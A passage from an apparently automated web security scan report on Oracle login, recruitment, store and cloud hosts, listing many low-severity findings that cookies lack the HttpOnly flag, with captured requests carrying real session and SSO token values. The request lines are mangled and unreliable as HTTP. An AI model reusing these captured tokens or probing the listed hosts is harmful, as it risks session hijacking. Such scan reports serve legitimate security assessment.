GET /OA_HTML/OA.jsp?OAFunc=IRC_VIS_ADV_JOB_SEARCH_PAGE&_ti=209088196&oapc=2&oas=c63Ec25IXJtclVMeE1fbdA.. HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisHomePG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.location%25253D%252527OA.jsp%25253FOAFunc%25253DIRC_VIS_ADV_JOB_SEARCH_PAGE%252526_ti%25253D209088196%252526oa%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure .oracle.com/OA_HTML/OA.jsp<head><title>Available Jobs</title><meta name="generator" content="Oracl...[SNIP]...
6.9. https://irecruitment.oracle.com/OA_HTML/RF.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/RF.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Request
GET /OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA.. HTTP/1.1.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; gpw_e24=no%20value; s_cc=true; s_sq=%5B%5BB%5D%5D; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure .oracle.com/OA_HTML/OA.jsp<head><title>iRecruitment Visitor Home Page</title><meta name="generator...[SNIP]...
6.10. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://oraclestore.oracle.com
Path:
/OA_HTML/ibeCAcpSSOLogin.jsp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=e777ccf7edc8301890cff82302c6164caa5fbe274fbcd6b64f26c589fd7e206f.e34Qb38Qax0Obi0La3mQaxaObNuNe0; path=/OA_HTML; secure GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/ GSI_pses=ZG3E0DB19D7D744455D1A0925C59A3AD3C1FF690A1596002B149367678487AD7773EFC9EF14E0C8F8F29DEECE96E7F0713; expires=Fri, 16-Dec-2011 02:34:05 GMT; path=/OA_HTML BIGipServergsiap_store_http=1510838925.5150.0000; path=/
Request
GET /OA_HTML/ibeCAcpSSOLogin.jsp HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp&langCode=USSet-Cookie: JSESSIONID=e777ccf7edc8301890cff82302c6164caa5fbe274fbcd6b64f26c589fd7e206f.e34Qb38Qax0Obi0La3mQaxaObNuNe0; path=/OA_HTML; secure Set-Cookie: GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/ Set-Cookie: GSI_pses=ZG3E0DB19D7D744455D1A0925C59A3AD3C1FF690A1596002B149367678487AD7773EFC9EF14E0C8F8F29DEECE96E7F0713; expires=Fri, 16-Dec-2011 02:34:05 GMT; path=/OA_HTML Set-Cookie: BIGipServergsiap_store_http=1510838925.5150.0000; path=/ >Redirect to https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore...[SNIP]...
6.11. https://cloud.oracle.com/mycloud/f
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cloud.oracle.com
Path:
/mycloud/f
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/
Request
GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service:home:0:::::;q=0.3%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA
Response
HTTP/1.1 200 OK-11gSet-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/ ...[SNIP]...
6.12. https://cloud.oracle.com/mycloud/wwv_flow.accept
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cloud.oracle.com
Path:
/mycloud/wwv_flow.accept
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/
Request
POST /mycloud/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service2:notify_me:0:::::;q=0.3DD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names...[SNIP]...
Response
HTTP/1.1 200 OK-11gSet-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/ ...[SNIP]...
6.13. https://login.oracle.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Request
GET /favicon.ico HTTP/1.1;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 404 Not FoundSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/ ...[SNIP]...
6.14. https://login.oracle.com/mysso/signon.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/signon.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Request
POST /mysso/signon.jsp HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000%7E656BF073%7EF67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069...[SNIP]...
Response
HTTP/1.1 200 OKUS1EaweP001nsgSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/ /DTD/xhtml-mobile10.dtd">...[SNIP]...
6.15. https://login.oracle.com/mysso/sso_loginui/b-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-bg.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/b-bg.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuQSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ !.......,..............P.;
6.16. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-l-corner.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuTSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ....................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;
6.17. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-r-corner.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuXSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ....................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;
6.18. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-l-b.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuOSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ....................................................................................!.......,..........E.D.di............N..br29..[..@.4l.4@a...pw..;
6.19. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-l-t.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntNSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ....................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;
6.20. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-line.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuNSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ..,..............P.;
6.21. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-r-b.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nuSSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/ ....................................................................................!.......,..........C`%.dINfj.j[.n...C..T....d].....N...y..x.!.;
6.22. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-r-t.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntOSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ....................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;
6.23. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-t-line.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvYSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..,...........D..Y.;
6.24. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/ip-o-logo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvKSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..........BB.......................................................................................................__.............................................................[SNIP]...
6.25. https://login.oracle.com/mysso/sso_loginui/loginStyling_external.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/loginStyling_external.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:40 GMT; path=/
Request
GET /mysso/sso_loginui/loginStyling_external.css?v=1.0 HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nt7Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:40 GMT; path=/ ...[SNIP]...
6.26. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/moc_lib.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Request
GET /mysso/sso_loginui/moc_lib.js HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nsdSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/ ------------------------//...[SNIP]...
6.27. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/oracle-footer-tagline.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvMSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..."""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ....[SNIP]...
6.28. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/oralogo_small.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntLSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ....//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^....[SNIP]...
6.29. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-l.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
